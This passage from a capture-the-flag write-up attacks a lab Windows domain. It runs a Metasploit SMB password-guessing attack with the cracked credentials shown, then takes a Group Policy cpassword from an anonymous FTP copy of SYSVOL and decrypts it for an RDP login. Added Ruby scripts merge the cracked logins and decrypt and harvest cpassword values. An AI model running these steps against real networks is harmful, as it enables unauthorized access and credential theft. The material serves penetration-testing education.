   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/smb/smb_login) > set abort_on_lockout true
abort_on_lockout => true
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/john/password.lst
pass_file => /usr/share/john/password.lst
msf6 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf6 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/smb/smb_login) > set rhost 172.20.20.37
rhost => 172.20.20.37
msf6 auxiliary(scanner/smb/smb_login) > run

[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\darcy.roman:spongebob'
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\eve.barr:dolphins'
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\jace.le:nikita' Administrator
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\max.clark:asdfghjkl'
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\sally.bird:popcorn'
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\summer.sloan:butterfly'
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\troy.yates:tinkerbell'
[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\yoder.mullins:margarita'
[*] 172.20.20.37:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
One of the good things about this module is that it reports which of the valid accounts have administrative access to the target (the Administrator tag after jace.le above). That makes it easier to pick the account to use next.
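Both tools report the same hits in different formats. As an added example that is not part of the original write-up, here is a small Ruby script that parses Hydra's and the smb_login module's success lines into one deduplicated credential list, keeps the module's Administrator flag, and prints the pairs in the USERPASS_FILE format that smb_login accepts. The sample lines are copied from the two runs above; the regular expressions assume exactly those line formats (a password containing a single quote or a space would need a different pattern).

```ruby
# Added example (not from the page): merge Hydra and Metasploit smb_login results.

# Hydra:      "[445][smb] host: 172.20.20.37   login: jace.le   password: nikita"
HYDRA_RE = /\[\d+\]\[smb\]\s+host:\s+(\S+)\s+login:\s+(\S+)\s+password:\s+(.*?)\s*\z/
# Metasploit: "[+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\jace.le:nikita' Administrator"
MSF_RE = /\[\+\]\s+(\S+?):\d+\s+-\s.*?Success:\s+'(?:([^\\']+)\\)?([^:']+):([^']*)'(\s+Administrator)?/

Credential = Struct.new(:host, :domain, :user, :password, :admin)

# Parse mixed output from both tools into deduplicated Credential structs, in first-seen order.
def parse_login_results(text)
  creds = {}
  text.each_line do |line|
    cred =
      if (m = HYDRA_RE.match(line))
        Credential.new(m[1], nil, m[2], m[3], false) # Hydra does not report admin rights
      elsif (m = MSF_RE.match(line))
        Credential.new(m[1], m[2], m[3], m[4], !m[5].nil?)
      end
    next unless cred
    key = [cred.host, cred.user.downcase, cred.password]
    if (seen = creds[key])
      seen.domain ||= cred.domain # keep the domain if either tool reported it
      seen.admin ||= cred.admin   # an Administrator flag from either line wins
    else
      creds[key] = cred
    end
  end
  creds.values
end

# USERPASS_FILE format for auxiliary/scanner/smb/smb_login: "user password", one pair per line.
def userpass_lines(creds)
  creds.map { |c| "#{c.user} #{c.password}" }
end

def admin_accounts(creds)
  creds.select(&:admin).map(&:user)
end

# Constructed sample: success lines copied from the Hydra and Metasploit runs above.
SAMPLE_OUTPUT = <<~'TXT'
  [445][smb] host: 172.20.20.37   login: jace.le   password: nikita
  [445][smb] host: 172.20.20.37   login: summer.sloan   password: butterfly
  [STATUS] 6291.00 tries/min, 6291 tries in 00:01h, 29299 to do in 00:05h, 1 active
  [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\jace.le:nikita' Administrator
  [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\summer.sloan:butterfly'
  [+] 172.20.20.37:445 - 172.20.20.37:445 - Success: 'scoville\max.clark:asdfghjkl'
  [*] 172.20.20.37:445 - Scanned 1 of 1 hosts (100% complete)
TXT

if __FILE__ == $PROGRAM_NAME
  creds = parse_login_results(SAMPLE_OUTPUT)
  puts userpass_lines(creds) # redirect to a file and `set userpass_file <file>` in msfconsole
  puts "admin: #{admin_accounts(creds).join(', ')}"
end
```

Feed the printed pairs back into smb_login via USERPASS_FILE to re-verify a Hydra run and get the Administrator flag for every hit in one short pass, instead of repeating the whole dictionary attack with the slower module.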
Anonymous FTP
Based on our Nmap scan results, the FTP service on port 6000 allows anonymous login. That said, let's explore it and see if we can find something there.
andrew@kali:~$ ftp 172.20.20.37 6000
Connected to 172.20.20.37.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (172.20.20.37:andrew): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> dir
200 Port command successful
150 Opening data channel for directory listing of "/"
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 domain
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging areas
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 sysvol
226 Successfully transferred "/"
The sysvol directory is a copy of the domain's SYSVOL share, where Group Policy objects are stored under Policies/{GUID}. After perusing the directories, I found an XML file worth looking at closely, in the Machine/Preferences/Groups folder of one of the policies. I downloaded the file and viewed its contents.
ftp> dir
200 Port command successful
150 Opening data channel for directory listing of "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups"
-r--r--r-- 1 ftp ftp            476 Oct 06  2020 Groups.xml
226 Successfully transferred "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups"
ftp> get Groups.xml
local: Groups.xml remote: Groups.xml
200 Port command successful
150 Opening data channel for file download from server of "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups/Groups.xml"
226 Successfully transferred "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups/Groups.xml"
476 bytes received in 0.00 secs (9.8685 MB/s)
ftp> !cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="admin.local" image="2" changed="2020-10-07 05:33:08" uid="{C0D33E59-13B3-4C4E-8E5D-F45AC3D762E9}"><Properties action="U" newName="" fullName="" description="" cpassword="E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="admin.local"/></User>
</Groups>
After viewing the contents, the cpassword attribute caught my eye. I used it as my search keyword and found a page on the vulnerability in Windows Group Policy Preferences (MS14-025). GPP stores the password of a local account it pushes out in that attribute, AES-256 encrypted, but Microsoft published the encryption key on MSDN, so anyone who can read SYSVOL (every domain user, or in this case anyone on the anonymous FTP share) can decrypt it. The 2014 patch only stopped the GPP editor from creating new cpassword entries; existing ones like this one stay in SYSVOL until an administrator removes them.

Since I am using Kali Linux, I did not want to run PowerShell on Linux, as the versions are not one-for-one equivalent. So I started looking at Python scripts that can decrypt it. Unfortunately, the first one I saw was not the right tool for the job. Eventually, I found out that Kali ships a tool for exactly this, called gpp-decrypt.
andrew@kali:~$ gpp-decrypt E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc
2019*letmein
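To see what gpp-decrypt does under the hood, here is an added Ruby example (not the page's code and not the gpp-decrypt script itself) that decrypts a cpassword value with the AES-256 key Microsoft published, and that walks a local copy of SYSVOL for every GPP file that can carry one. The embedded Groups.xml is a constructed copy of the file recovered above; the list of file names and account attributes is my own list of the GPP XML types that can contain a cpassword.

```ruby
# Added example, not the page's or gpp-decrypt's own code: decrypt Group Policy
# Preferences cpassword values and harvest them from GPP XML files under a SYSVOL copy.
require 'openssl'
require 'base64'
require 'rexml/document'

# 32-byte AES key Microsoft published on MSDN (MS14-025). It is the same in every
# domain, which is why anyone who can read SYSVOL can recover the plaintext.
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

# Decrypt one cpassword attribute value and return the password as UTF-8.
def gpp_decrypt(cpassword)
  # GPP drops the base64 '=' padding; restore it so the length is a multiple of 4.
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = Base64.strict_decode64(padded)
  aes = OpenSSL::Cipher.new('aes-256-cbc')
  aes.decrypt
  aes.key = GPP_AES_KEY
  aes.iv = "\x00" * 16 # the specification uses an all-zero IV
  plaintext = aes.update(ciphertext) + aes.final # final also strips the PKCS#7 padding
  plaintext.force_encoding('UTF-16LE').encode('UTF-8')
end

# GPP XML files that can carry a cpassword, and the attributes that name the account in them.
GPP_FILES     = %w[Groups.xml Services.xml ScheduledTasks.xml DataSources.xml Drives.xml Printers.xml]
ACCOUNT_ATTRS = %w[userName accountName runAs username]

# Parse one GPP XML document; returns one hash per non-empty cpassword.
def extract_gpp_passwords(xml_text, source = 'Groups.xml')
  doc = REXML::Document.new(xml_text)
  hits = []
  REXML::XPath.each(doc, '//*[@cpassword]') do |props|
    cpw = props.attributes['cpassword'].to_s
    next if cpw.empty? # an empty cpassword means no password was set in that item
    account = ACCOUNT_ATTRS.map { |a| props.attributes[a] }.compact.first
    account ||= props.parent.attributes['name'] # fall back to the item's display name
    hits << { source: source, account: account, cpassword: cpw, password: gpp_decrypt(cpw) }
  end
  hits
end

# Walk a local copy of SYSVOL (for example one pulled from the FTP share above).
def find_gpp_passwords(sysvol_dir)
  Dir.glob(File.join(sysvol_dir, '**', '*.xml')).flat_map do |path|
    GPP_FILES.include?(File.basename(path)) ? extract_gpp_passwords(File.read(path), path) : []
  end
end

# Constructed sample mirroring the Groups.xml recovered from SYSVOL above.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="admin.local" image="2" changed="2020-10-07 05:33:08" uid="{C0D33E59-13B3-4C4E-8E5D-F45AC3D762E9}"><Properties action="U" newName="" fullName="" description="" cpassword="E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="admin.local"/></User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  extract_gpp_passwords(SAMPLE_GROUPS_XML).each do |hit|
    puts "#{hit[:source]}: #{hit[:account]} => #{hit[:password]}"
  end
end
```

Point find_gpp_passwords at a mirrored sysvol tree (for example after `wget -r` against the FTP share) to catch cpassword values in Services.xml, ScheduledTasks.xml and the other preference types, not only the Groups.xml that happened to turn up here; the same routine is what a defender can run against a domain's own SYSVOL to find leftovers that predate the 2014 patch.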
With the admin.local username and its recovered password in hand, we can log in to the desktop environment over RDP.
Final thoughts
Many Windows vulnerabilities have been discovered over the years. In this article, we covered and exploited a few of them. As I previously mentioned, CTFs and real-world engagements differ. Some CTFs are unrealistic in this day and age, but some are still valid, because some businesses lack the budget for security or simply do not prioritize it.
Some of the tactics, techniques, and procedures covered here apply only to CTFs. But CTF write-ups such as this one still have value as learning opportunities.
While the Kaos Corp environment has one or two more hosts left to explore, I may end the series here. The first article of the series was not as popular as I had hoped.